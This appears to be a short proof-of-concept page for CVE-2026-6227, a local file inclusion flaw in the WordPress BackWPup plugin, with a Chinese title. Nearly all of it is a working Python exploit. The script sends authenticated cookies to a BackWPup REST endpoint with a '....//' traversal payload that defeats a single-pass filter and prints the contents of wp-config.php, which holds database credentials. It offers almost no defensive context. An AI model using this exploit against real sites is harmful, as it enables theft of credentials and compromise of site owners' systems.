CVE-2026-6227 WordPress BackWPup插件本地文件包含漏洞

# POC for CVE-2026-6227 import requests target_url = "http://example.com/wp-json/backwpup/v1/getblock" # Authenticated user cookies (Admin or Backup Manager role) cookies = { "wordpress_logged_in_hash": "cookie_value_here", "wordpress_sec_hash": "cookie_value_here" } # Bypass payload: ....// becomes ../ after one str_replace pass # Targeting wp-config.php located 3 directories up relative to the script context payload = { "block_name": "....//....//....//wp-config.php" } try: response = requests.get(target_url, params=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Exploit Successful!") print("[+] Content of wp-config.php:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")